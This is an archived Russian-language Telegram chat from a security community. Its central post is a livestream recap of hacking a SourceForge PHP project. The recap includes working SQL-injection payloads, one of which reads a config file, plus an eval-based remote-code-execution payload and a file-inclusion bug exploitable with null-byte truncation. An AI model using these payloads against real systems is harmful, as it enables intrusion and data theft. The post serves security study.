Size: a a a

2020 April 15

L

Lord Voldemort in [No Offenсe]
А еще бы интересно посмотреть аудит новых версий php , mysql
интересно unserialize() phpmyadmin
источник

L

Lord Voldemort in [No Offenсe]
slider
мими ❤️
источник

L

Lord Voldemort in [No Offenсe]
Вот я помню мучался с %00 в php 7.0 а он пофикшен еще в 5.2
источник

L

Lord Voldemort in [No Offenсe]
я начал изучать пхп вот только на 7 версии.
источник

AB

Alexander Bezopasnikov in [No Offenсe]
Lord Voldemort
А еще бы интересно посмотреть аудит новых версий php , mysql
интересно unserialize() phpmyadmin
Сделаем
источник

L

Lord Voldemort in [No Offenсe]
Знакомый нашел в одной мейл-рушной игрушке багу с unserialize()
и 3к $ получил.
источник

NK

ID:0 in [No Offenсe]
Друзья, ниже небольшая выжимка из стрима!

❗️❕❗️Стрим доступен по той же ссылке. Запись осталась

После эфира было много комментариев по поводу ведения стрима, каюсь, я только учусь.
В следующий раз постараюсь составить какой-то предварительный план и меньше отвлекаться на чат и донаты.
Возможно придется делать каждые минут 20 остановки на чат.

Итак, к багам

Тезисно по стриму:
- Ломали
https://sourceforge.net/projects/nice-stash/files/

Нашли:
1. union based SQLi
File: /downloadmp3.php
Payload:
?download=3'+union+select+1,2,3,4,5,6--+
Вывод в имени аттача
Эту же sqli можно использовать в качестве читалки файлов:
Payload:
?download=3'+union+select+1,2,3,4,5,'../../admin/config.php'--+

2. RCE
File: /admin/info.php
Payload:
&datetype=US'; if(isset($_REQUEST['cmd']))eval($_REQUEST['cmd']);echo'

3. Бага с читалкой файлов, по поводу которой был холивар в чате:
if(isset($_GET['template'])) {  
 $templatedata = openTemplates("template/".$_GET['template'].".tpl.html");
}

Если установлена версия php, где не пофиксили null-byte, можно обрезать суффикс с помощью %00

Ссылки нашего комьюнити ниже:
http://no.offence.site/yt - YouTube
http://no.offence.site/group - Telegram group
http://no.offence.site/channel - Telegram channel

Спасибо, что вы поддерживаете меня просмотрами, лайками, комментариями.
Я буду делать стримы качественнее от раза к разу, и буду рад вас видеть!

До скорого!
источник

L

Lord Voldemort in [No Offenсe]
источник

S

SKYNET in [No Offenсe]
Хороший материал 👍
источник
2020 April 16

VT

Va T in [No Offenсe]
Ivan V
а я ему в личку скинул уже
скинь мне тоже почитать =)
источник

NK

ID:0 in [No Offenсe]
источник

AB

Alexander Bezopasnikov in [No Offenсe]
Красивое число 😈
источник

IV

Ivan V in [No Offenсe]
еще чуток и тыща
источник

AB

Alexander Bezopasnikov in [No Offenсe]
777 пропустил(
источник

Y

Yenlik in [No Offenсe]
Alexander Bezopasnikov
777 пропустил(
источник

AB

Alexander Bezopasnikov in [No Offenсe]
Фотошоп!!!1
источник

НН

Нурсултан Нурсултан in [No Offenсe]
источник

Y

Yenlik in [No Offenсe]
Alexander Bezopasnikov
Фотошоп!!!1
@Franky_T Тааань, они все таки лайки только ценят:(
источник

AB

Alexander Bezopasnikov in [No Offenсe]
Yenlik
@Franky_T Тааань, они все таки лайки только ценят:(
Лайки не главное)
источник

Y

Yenlik in [No Offenсe]
Alexander Bezopasnikov
Лайки не главное)
Очень даже согласна)
источник